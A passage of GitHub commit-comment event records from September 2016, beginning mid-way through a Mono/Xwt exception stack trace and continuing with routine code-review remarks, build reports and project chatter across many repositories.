/usr/lib/mono/gac/glib-sharp/3.0.0.0__35e10195dab3c99f/glib-sharp.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/cairo-sharp/1.10.0.0__0738eb9f132ed756/cairo-sharp.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/pango-sharp/3.0.0.0__35e10195dab3c99f/pango-sharp.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/gdk-sharp/3.0.0.0__35e10195dab3c99f/gdk-sharp.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/atk-sharp/3.0.0.0__35e10195dab3c99f/atk-sharp.dll [External]\r\n\r\nMarshaling realize signal\r\nException in Gtk# callback delegate\r\n  Note: Applications can use GLib.ExceptionManager.UnhandledException to handle the exception.\r\nSystem.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.NullReferenceException: Object reference not set to an instance of an object\r\n  at Xwt.GtkBackend.LabelBackend.SetFormattedText (Xwt.FormattedText text) [0x0003b] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs:168 \r\n  at Xwt.GtkBackend.LabelBackend.HandleStyleUpdate (System.Object sender, System.EventArgs e) [0x00024] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs:202 \r\n  at (wrapper managed-to-native) System.Reflection.MonoMethod:InternalInvoke (System.Reflection.MonoMethod,object,object[],System.Exception&)\r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) [0x00038] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System.Reflection/MonoMethod.cs:295 \r\n  --- End of inner exception stack trace ---\r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) [0x0004d] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System.Reflection/MonoMethod.cs:303 \r\n  at System.Reflection.MethodBase.Invoke (System.Object obj, System.Object[] parameters) [0x00000] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/mscorlib/system/reflection/methodbase.cs:277 \r\n  at System.Delegate.DynamicInvokeImpl (System.Object[] args) [0x00107] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/Delegate.cs:461 \r\n  at System.MulticastDelegate.DynamicInvokeImpl (System.Object[] args) [0x0000b] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/MulticastDelegate.cs:67 \r\n  at System.Delegate.DynamicInvoke (System.Object[] args) [0x00000] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/Delegate.cs:406 \r\n  at GLib.Signal.ClosureInvokedCB (System.Object o, GLib.ClosureInvokedArgs args) [0x0003d] in <filename unknown>:0 \r\n  at GLib.SignalClosure.Invoke (GLib.ClosureInvokedArgs args) [0x0000c] in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) [0x00086] in <filename unknown>:0 \r\n  at GLib.ExceptionManager.RaiseUnhandledException (System.Exception e, Boolean is_terminal) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.gtksharp_container_invoke_gtk_callback (IntPtr , IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container+CallbackInvoker.Invoke (Gtk.Widget w) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.ForAll (Boolean includeInternals, Gtk.Callback callback) [0x00028] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/BoxBackend.cs:158 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7ff5e6eae760 (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.gtk_widget_set_parent (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.set_Parent (Gtk.Widget value) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.OnAdded (Gtk.Widget widget) [0x00003] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/BoxBackend.cs:118 \r\n  at Gtk.Container.Added_cb (IntPtr inst, IntPtr widget) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.gtk_container_add (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Add (Gtk.Widget widget) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.Add (Xwt.Widget w, Gtk.Widget gw) [0x00050] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/BoxBackend.cs:113 \r\n  at Xwt.GtkBackend.BoxBackend.Add (IWidgetBackend widget) [0x0001a] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/BoxBackend.cs:51 \r\n  at Xwt.Box.OnAdd (Xwt.Widget child, Xwt.BoxPlacement placement) [0x00019] in /data/git/xwt/Xwt/Xwt/Box.cs:247 \r\n  at Xwt.Box+WidgetBackendHost.AddedItem (Xwt.BoxPlacement item, Int32 index) [0x00013] in /data/git/xwt/Xwt/Xwt/Box.cs:48 \r\n  at Xwt.ChildrenCollection`1[T].InsertItem (Int32 index, Xwt.T item) [0x00011] in /data/git/xwt/Xwt/Xwt/ChildrenCollection.cs:45 \r\n  at System.Collections.ObjectModel.Collection`1[T].Add (System.Collections.ObjectModel.T item) [0x00023] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/mscorlib/system/collections/objectmodel/collection.cs:76 \r\n  at Xwt.Box.Pack (Xwt.Widget widget, Nullable`1 expand, WidgetPlacement align, PackOrigin ptype) [0x00093] in /data/git/xwt/Xwt/Xwt/Box.cs:220 \r\n  at Xwt.Box.PackStart (Xwt.Widget widget, Boolean expand) [0x0001c] in /data/git/xwt/Xwt/Xwt/Box.cs:109 \r\n  at Samples.MainWindow.HandleSamplesTreeSelectionChanged (System.Object sender, System.EventArgs e) [0x00091] in /data/git/xwt/TestApps/Samples/MainWindow.cs:187 \r\n  at Xwt.TreeView.OnSelectionChanged (System.EventArgs a) [0x00014] in /data/git/xwt/Xwt/Xwt/TreeView.cs:497 \r\n  at Xwt.TreeView+WidgetBackendHost.OnSelectionChanged () [0x0000c] in /data/git/xwt/Xwt/Xwt/TreeView.cs:55 \r\n  at Xwt.GtkBackend.TableViewBackend.<HandleWidgetSelectionChanged>m__0 () [0x00007] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/TableViewBackend.cs:141 \r\n  at Xwt.Toolkit.Invoke (System.Action a) [0x00015] in /data/git/xwt/Xwt/Xwt/Toolkit.cs:423 \r\n  at Xwt.Backends.ApplicationContext.InvokeUserCode (System.Action a) [0x00008] in /data/git/xwt/Xwt/Xwt.Backends/ApplicationContext.cs:58 \r\n  at Xwt.GtkBackend.TableViewBackend.HandleWidgetSelectionChanged (System.Object sender, System.EventArgs e) [0x00013] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/TableViewBackend.cs:140 \r\n  at System.Reflection.MonoMethod.InternalInvoke (System.Reflection.MonoMethod , System.Object , System.Object[] , System.Exception& ) [0x00000] in <filename unknown>:0 \r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) [0x00038] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System.Reflection/MonoMethod.cs:295 \r\n  at System.Reflection.MethodBase.Invoke (System.Object obj, System.Object[] parameters) [0x00000] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/mscorlib/system/reflection/methodbase.cs:277 \r\n  at System.Delegate.DynamicInvokeImpl (System.Object[] args) [0x00107] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/Delegate.cs:461 \r\n  at System.MulticastDelegate.DynamicInvokeImpl (System.Object[] args) [0x0000b] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/MulticastDelegate.cs:67 \r\n  at System.Delegate.DynamicInvoke (System.Object[] args) [0x00000] in /builddir/build/BUILD/mono-4.2.4/mcs/class/corlib/System/Delegate.cs:406 \r\n  at GLib.Signal.ClosureInvokedCB (System.Object o, GLib.ClosureInvokedArgs args) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.Invoke (GLib.ClosureInvokedArgs args) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7ff5e70b08b0 (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Application.gtk_main () [0x00000] in <filename unknown>:0 \r\n  at Gtk.Application.Run () [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.GtkEngine.RunApplication () [0x00001] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/GtkEngine.cs:161 \r\n  at Xwt.Application.<Run>m__0 () [0x00006] in /data/git/xwt/Xwt/Xwt/Application.cs:141 \r\n  at Xwt.Toolkit.InvokePlatformCode (System.Action a) [0x00018] in /data/git/xwt/Xwt/Xwt/Toolkit.cs:444 \r\n  at Xwt.Application.Run () [0x0005f] in /data/git/xwt/Xwt/Xwt/Application.cs:140 \r\n  at Samples.App.Run (ToolkitType type) [0x00013] in /data/git/xwt/TestApps/Samples/App.cs:17 \r\n  at GtkTest.MainClass.Main (System.String[] args) [0x00002] in /data/git/xwt/TestApps/Gtk3Test/Main.cs:36 \r\nException in Gtk# callback delegate\r\n  Note: Applications can use GLib.ExceptionManager.UnhandledException to handle the exception.\r\nSystem.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.\r\n  at System.ThrowHelper.ThrowKeyNotFoundException () [0x00000] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/mscorlib/system/throwhelper.cs:70 \r\n  at System.Collections.Generic.Dictionary`2[TKey,TValue].get_Item (System.Collections.Generic.TKey key) [0x00021] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/mscorlib/system/collections/generic/dictionary.cs:176 \r\n  at GLib.Object.TryGetObject (IntPtr o) [0x00022] in <filename unknown>:0 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) [0x00000] in <filename unknown>:0 \r\n  at GLib.ExceptionManager.RaiseUnhandledException (System.Exception e, Boolean is_terminal) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7ff5e6eae720 (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.gtk_widget_destroy (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.Destroy () [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.WidgetBackend.Dispose (Boolean disposing) [0x00030] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/WidgetBackend.cs:267 \r\n  at Xwt.GtkBackend.WidgetBackend.Dispose () [0x00009] in /data/git/xwt/Xwt.Gtk/Xwt.GtkBackend/WidgetBackend.cs:260 \r\n  at Xwt.Widget.Dispose (Boolean disposing) [0x00025] in /data/git/xwt/Xwt/Xwt/Widget.cs:317 \r\n  at System.ComponentModel.Component.Dispose () [0x00000] in /builddir/build/BUILD/mono-4.2.4/external/referencesource/System/compmod/system/componentmodel/Component.cs:119 \r\n  at Xw\r\n"}},"created_at":"2016-09-26T20:28:58Z"}
{"id":"4620236254","type":"CommitCommentEvent","actor":{"login":"Rustik6030"},"repo":{"name":"Rustamnurg/HW2Storyboard"},"payload":{"comment":{"id":19179315,"position":null,"line":null,"path":null,"commit_id":"27c99c867babf1f85fbe6032d4b23d90951f2af6","created_at":"2016-09-26T20:29:07Z","updated_at":"2016-09-26T20:29:07Z","body":"123"}},"created_at":"2016-09-26T20:29:07Z"}
{"id":"4620240441","type":"CommitCommentEvent","actor":{"login":"Arccotangent"},"repo":{"name":"unixpickle/kahoot-hack"},"payload":{"comment":{"id":19179326,"position":10,"line":11,"path":"kahoot-crash/main.go","commit_id":"43451045f7da61e872deabcea987e108419f20c9","created_at":"2016-09-26T20:29:52Z","updated_at":"2016-09-26T20:29:52Z","body":"This is not how you use this program."}},"created_at":"2016-09-26T20:29:52Z"}
{"id":"4620240510","type":"CommitCommentEvent","actor":{"login":"Rustik6030"},"repo":{"name":"Rustamnurg/HW2Storyboard"},"payload":{"comment":{"id":19179327,"position":null,"line":null,"path":null,"commit_id":"27c99c867babf1f85fbe6032d4b23d90951f2af6","created_at":"2016-09-26T20:29:53Z","updated_at":"2016-09-26T20:29:53Z","body":"123"}},"created_at":"2016-09-26T20:29:53Z"}
{"id":"4620243849","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"shahsarick/dsp"},"payload":{"comment":{"id":19179334,"position":null,"line":null,"path":null,"commit_id":"35a40c38aed282007fa41816398e27938b31efd4","created_at":"2016-09-26T20:30:27Z","updated_at":"2016-09-26T20:30:27Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @shahsarick \r\n\r\nNice work on Python! Here are some comments:\r\n- Q1: note that both lists and tuples can have entries of different types.\r\n- Q4: don't forget to `import types`. Also, how do the capabilities of list comprehensions compare with map and filter?\r\n- Q5 shows three different date formats. Do you know how to decode each using `datetime` methods? In your code you are doing the decoding manually.\r\n- Q6: `donuts(count)` doesn't work, it does not return the count when the number of donuts is less than 10.\r\n- Q6: `mix_up` returns two strings, only one is asked.\r\n- Q7, `linear_merge`: The code after the `while` loop is incorrectly indented.\r\n- Q8: You did not use Python to find the team with the smallest absolute value difference between goals and goals allowed. Instead, it looks like you found the smallest difference by hand, after printing out the list of differences...\r\n\r\n\r\n"}},"created_at":"2016-09-26T20:30:27Z"}
{"id":"4620245137","type":"CommitCommentEvent","actor":{"login":"ShameelAmjad"},"repo":{"name":"nainaraut/Carpooling-Mobile-App"},"payload":{"comment":{"id":19179337,"position":null,"line":null,"path":null,"commit_id":"c11049f318eee3ca17ac876fda44e4a5a1354c17","created_at":"2016-09-26T20:30:41Z","updated_at":"2016-09-26T20:30:41Z","body":"hi naina \r\n\r\ncan i get apk ?\r\nof this project \r\n'F:/SCU_Third_Quarter/Mobile App/SharewaysignedAPK.jks'"}},"created_at":"2016-09-26T20:30:41Z"}
{"id":"4620248008","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19179344,"position":36,"line":118,"path":"squelette/jsExos/ALEX_CH04.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-26T20:31:12Z","updated_at":"2016-09-26T20:31:12Z","body":"`setInterval` is evil, [`requestAnimationFrame`](https://www.w3.org/TR/html51/webappapis.html#animation-frames) rocks."}},"created_at":"2016-09-26T20:31:12Z"}
{"id":"4620248622","type":"CommitCommentEvent","actor":{"login":"darkdreamingdan"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19179348,"position":null,"line":null,"path":null,"commit_id":"6e129960098aad9ea636728b4f749f3b5a5b774d","created_at":"2016-09-26T20:31:19Z","updated_at":"2016-09-26T20:31:19Z","body":"✓"}},"created_at":"2016-09-26T20:31:19Z"}
{"id":"4620250541","type":"CommitCommentEvent","actor":{"login":"ShameelAmjad"},"repo":{"name":"nainaraut/Carpooling-Mobile-App"},"payload":{"comment":{"id":19179350,"position":null,"line":null,"path":null,"commit_id":"1b1d2de6e57f1ab7c59c052e7233e3fc938c0d54","created_at":"2016-09-26T20:31:41Z","updated_at":"2016-09-26T20:31:41Z","body":"hi naina \r\n\r\ncan i get apk ?\r\nof this project \r\n'F:/SCU_Third_Quarter/Mobile App/SharewaysignedAPK.jks'"}},"created_at":"2016-09-26T20:31:41Z"}
{"id":"4620251438","type":"CommitCommentEvent","actor":{"login":"kkapelon"},"repo":{"name":"scrain/java-testing-with-spock"},"payload":{"comment":{"id":19179354,"position":null,"line":null,"path":null,"commit_id":"7d6f9f98698d9a45f4155714726b985b271d423b","created_at":"2016-09-26T20:31:52Z","updated_at":"2016-09-26T20:31:52Z","body":"Hello\r\n\r\nI wanted to let you know that Gradle support is now present in the official source code of the book! Please take a look and see if it suits you.\r\n\r\nKostis"}},"created_at":"2016-09-26T20:31:52Z"}
{"id":"4620251906","type":"CommitCommentEvent","actor":{"login":"strycore"},"repo":{"name":"Sunderland93/ffmpeg-nvenc"},"payload":{"comment":{"id":19179356,"position":null,"line":null,"path":null,"commit_id":"a7673ae6898da595460280dedd4d07ed5df2a9ed","created_at":"2016-09-26T20:31:57Z","updated_at":"2016-09-26T20:31:57Z","body":"@mike-teehan that's exactly what I did (and what I usually do when I see forks on my projects that don't make pull requests)"}},"created_at":"2016-09-26T20:31:57Z"}
{"id":"4620254082","type":"CommitCommentEvent","actor":{"login":"saaros"},"repo":{"name":"saaros/pg_partman"},"payload":{"comment":{"id":19179362,"position":null,"line":null,"path":null,"commit_id":"5f0ae0c9c298b9d149f29bbaddda6c995d9c7653","created_at":"2016-09-26T20:32:22Z","updated_at":"2016-09-26T20:32:22Z","body":"I'll try to review the code in more depth later this week.  The two issues I created a pull request for are things I spotted on my first review of the code and I haven't really done much testing with them yet.\r\n\r\nI'm also interested in full 9.6 support."}},"created_at":"2016-09-26T20:32:22Z"}
{"id":"4620255338","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-kkajla12"},"payload":{"comment":{"id":19179365,"position":null,"line":null,"path":null,"commit_id":"4e0beaba3424f1249481b14ef678b9accdb94615","created_at":"2016-09-26T20:32:36Z","updated_at":"2016-09-26T20:32:36Z","body":"More generally, after rebasing with autosquash, the history may not contain atomic commits. A good (but not perfect) commit history can be seen in https://github.com/AppFolioOnboarding/image-sharer-lsq921224/pull/43/commits. A change that I would probably make is to make adding the link to the share page be the last commit, combined with adding the flow test. In any case, feel free to reference that commit history for an idea of how this can be broken into atomic commits."}},"created_at":"2016-09-26T20:32:36Z"}
{"id":"4620257346","type":"CommitCommentEvent","actor":{"login":"rrccookimo"},"repo":{"name":"fsit02/hw-html-table-rrccookimo"},"payload":{"comment":{"id":19179369,"position":null,"line":null,"path":null,"commit_id":"4c4c46c21733065f51a9ab5e18dc00dec75e1754","created_at":"2016-09-26T20:32:58Z","updated_at":"2016-09-26T20:32:58Z","body":"作業上傳"}},"created_at":"2016-09-26T20:32:58Z"}
{"id":"4620264589","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19179384,"position":null,"line":null,"path":null,"commit_id":"95f761285065005ec7d566d46215b0219e87b144","created_at":"2016-09-26T20:34:14Z","updated_at":"2016-09-26T20:34:14Z","body":"@jasonliul updated"}},"created_at":"2016-09-26T20:34:14Z"}
{"id":"4620272590","type":"CommitCommentEvent","actor":{"login":"kardishcj"},"repo":{"name":"kardishcj/first_repo"},"payload":{"comment":{"id":19179403,"position":null,"line":null,"path":null,"commit_id":"d3fbb8e9c32d149f1ef7223930d5cce6ab8df4e7","created_at":"2016-09-26T20:35:43Z","updated_at":"2016-09-26T20:35:43Z","body":"fsdfsdfsdf"}},"created_at":"2016-09-26T20:35:43Z"}
{"id":"4620273818","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19179406,"position":35,"line":311,"path":"spring-boot/src/test/java/org/springframework/boot/logging/logback/LogbackLoggingSystemTests.java","commit_id":"43361e0ca5180f608513e6f26d29d93c3a40142c","created_at":"2016-09-26T20:35:56Z","updated_at":"2016-09-26T20:35:56Z","body":"@dunse We're aware of that. You need some changes in Spring Cloud too: https://github.com/spring-cloud/spring-cloud-commons/issues/125"}},"created_at":"2016-09-26T20:35:56Z"}
{"id":"4620277573","type":"CommitCommentEvent","actor":{"login":"chimurai"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19179419,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-26T20:36:36Z","updated_at":"2016-09-26T20:36:36Z","body":"Hi @julbra.\r\n\r\nGood news. Think I've found the issue. \r\nI created a fix in PR #114. (Also created a separate issue #113 to track the issue)\r\n\r\nCan you verify if this fixes the memory leak? (You only need to replace 1 file.)"}},"created_at":"2016-09-26T20:36:36Z"}
{"id":"4620281403","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19179433,"position":null,"line":null,"path":null,"commit_id":"5dc00702b86fcfd6924cf9005ccc2773ce0f4020","created_at":"2016-09-26T20:37:20Z","updated_at":"2016-09-26T20:37:20Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/aws-s3-drupal](https://peterpanth-static-docs.pantheonsite.io/docs/aws-s3-drupal)\n- [docs/content-delivery-network](https://peterpanth-static-docs.pantheonsite.io/docs/content-delivery-network)\n- [docs/drupal-s3](https://peterpanth-static-docs.pantheonsite.io/docs/drupal-s3)\n- [docs/wordpress-cloudfront](https://peterpanth-static-docs.pantheonsite.io/docs/wordpress-cloudfront)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/7762d4bd6d0e93ee86c82a2580f2373475af18e6/app/config/sculpin_site.yml)\n"}},"created_at":"2016-09-26T20:37:20Z"}
{"id":"4620284208","type":"CommitCommentEvent","actor":{"login":"stnava"},"repo":{"name":"stnava/ANTsR"},"payload":{"comment":{"id":19179439,"position":null,"line":null,"path":null,"commit_id":"63db009342924b41f7b870f64133f2a753e330ce","created_at":"2016-09-26T20:37:51Z","updated_at":"2016-09-26T20:37:51Z","body":"ok - great, i started doing this by creating itkRIPMMARCImageFilter ( just committed ) which is a start at a more traditional itk class .... implementation is mostly empty so far.  as a start, see:\r\n\r\nhttps://github.com/stnava/ANTsR/blob/master/src/patchAnalysis.cpp#L47-L50\r\n\r\nhttps://github.com/stnava/ANTsR/blob/master/src/itkRIPMMARCImageFilter.hxx#L117\r\n\r\ni intend that the filter will take 2 masks -  a full mask and a subsampling mask ( random mask )  - as well as the image and other basic parameters.\r\n\r\nany help would be appreciated."}},"created_at":"2016-09-26T20:37:51Z"}
{"id":"4620293083","type":"CommitCommentEvent","actor":{"login":"obenland"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19179461,"position":54,"line":54,"path":"client/state/states-list/test/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T20:39:29Z","updated_at":"2016-09-26T20:39:29Z","body":"Hm, I tried the follwoing, but it didn't work:\r\n\r\n```js\r\nnock( 'https://public-api.wordpress.com:443' )\r\n\t.persist()\r\n\t.get( '/rest/v1.1/domains/supported-states/US' )\r\n\t.reply( 200, [\r\n\t\t{ code: 'AK', name: 'Alaska' },\r\n\t\t{ code: 'AS', name: 'American Samoa' }\r\n\t] )\r\n\t.get( '/rest/v1.1/domains/supported-states/CA' )\r\n\t.reply( 500, {\r\n\t\terror: 'server_error',\r\n\t\tmessage: 'A server error occurred',\r\n\t} );\r\n```\r\nI could also add the second 200 call separately for them to break down to the three tests."}},"created_at":"2016-09-26T20:39:29Z"}
{"id":"4620293978","type":"CommitCommentEvent","actor":{"login":"mikeweilgart"},"repo":{"name":"benjaminoakes/maid"},"payload":{"comment":{"id":19179464,"position":21,"line":18,"path":"README.md","commit_id":"d727286d7d9cc9ce0795851070acf2271ce63931","created_at":"2016-09-26T20:39:38Z","updated_at":"2016-09-26T20:39:38Z","body":"Ah.  I just read up on it.  I hadn't realized that crippleware qualified.  (Or maybe it's nagware, but I don't feel like leaving it installed to find out.)"}},"created_at":"2016-09-26T20:39:38Z"}
{"id":"4620297266","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/buildtools"},"payload":{"comment":{"id":19179473,"position":5,"line":109,"path":"src/Microsoft.DotNet.Build.Tasks/PackageFiles/FrameworkTargeting.targets","commit_id":"073d09f047bf4d288275e7f9d184da454b4c4ae5","created_at":"2016-09-26T20:40:14Z","updated_at":"2016-09-26T20:40:14Z","body":"It looks like this change broke the test build of https://github.com/dotnet/corefx/blob/master/src/System.ServiceProcess.ServiceController/tests/System.ServiceProcess.ServiceController.Tests/System.ServiceProcess.ServiceController.Tests.csproj.  Likely due to its use of \"SetConfiguration\" metadata."}},"created_at":"2016-09-26T20:40:14Z"}
{"id":"4620309516","type":"CommitCommentEvent","actor":{"login":"dunse"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19179499,"position":35,"line":311,"path":"spring-boot/src/test/java/org/springframework/boot/logging/logback/LogbackLoggingSystemTests.java","commit_id":"43361e0ca5180f608513e6f26d29d93c3a40142c","created_at":"2016-09-26T20:42:32Z","updated_at":"2016-09-26T20:42:32Z","body":"Cool, I didn't see that before. Will upgrade spring cloud and see that it works as expected. thanks!"}},"created_at":"2016-09-26T20:42:32Z"}
{"id":"4620314059","type":"CommitCommentEvent","actor":{"login":"MartinStrbacka"},"repo":{"name":"CZ-NIC/turris-os"},"payload":{"comment":{"id":19179510,"position":null,"line":null,"path":null,"commit_id":"38a725907ea847fc03a12bd9df380bcd4bfb2553","created_at":"2016-09-26T20:43:24Z","updated_at":"2016-09-26T20:43:24Z","body":"@danrl  Currently we have Linux 4.4 in Turris Omnia. This commit disables wireguard for the previous version of Turris router where we use Linux 3.18 still. "}},"created_at":"2016-09-26T20:43:24Z"}
{"id":"4620316071","type":"CommitCommentEvent","actor":{"login":"seongminleeeee"},"repo":{"name":"seongminleeeee/assignment1"},"payload":{"comment":{"id":19179515,"position":null,"line":null,"path":null,"commit_id":"0cc1976840230b1a3105690d3431d8550d4a36db","created_at":"2016-09-26T20:43:46Z","updated_at":"2016-09-26T20:43:46Z","body":"@matty-digital"}},"created_at":"2016-09-26T20:43:46Z"}
{"id":"4620322189","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19179532,"position":null,"line":null,"path":null,"commit_id":"50907068e7af7cf1b284b7a5463efd62c565d98b","created_at":"2016-09-26T20:44:53Z","updated_at":"2016-09-26T20:44:53Z","body":"license-update (axelstudios) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2357 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T20:44:53Z"}
{"id":"4620324375","type":"CommitCommentEvent","actor":{"login":"prakasamd"},"repo":{"name":"prakasamd/DataStructures"},"payload":{"comment":{"id":19179538,"position":null,"line":null,"path":null,"commit_id":"1271446149cad6f1ec493cea046b5081bb524f40","created_at":"2016-09-26T20:45:17Z","updated_at":"2016-09-26T20:45:17Z","body":"Good start"}},"created_at":"2016-09-26T20:45:17Z"}
{"id":"4620326074","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19179541,"position":54,"line":54,"path":"client/state/states-list/test/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T20:45:35Z","updated_at":"2016-09-26T20:45:35Z","body":">Hm, I tried the follwoing, but it didn't work:\r\n\r\nWhat wasn't working? You'd need to update the failing test to request `CA` to verify the failure. Else can you post the error message?"}},"created_at":"2016-09-26T20:45:35Z"}
{"id":"4620326117","type":"CommitCommentEvent","actor":{"login":"dyerrington"},"repo":{"name":"dyerrington/DSI-test"},"payload":{"comment":{"id":19179542,"position":null,"line":null,"path":null,"commit_id":"3226aa6bbcff5a40094ea973617abe089d6c1a4c","created_at":"2016-09-26T20:45:35Z","updated_at":"2016-09-26T20:45:35Z","body":"Nice file dude!"}},"created_at":"2016-09-26T20:45:35Z"}
{"id":"4620327397","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19179546,"position":7,"line":7,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T20:45:49Z","updated_at":"2016-09-26T20:45:49Z","body":"Зачем такой конструктор?"}},"created_at":"2016-09-26T20:45:49Z"}
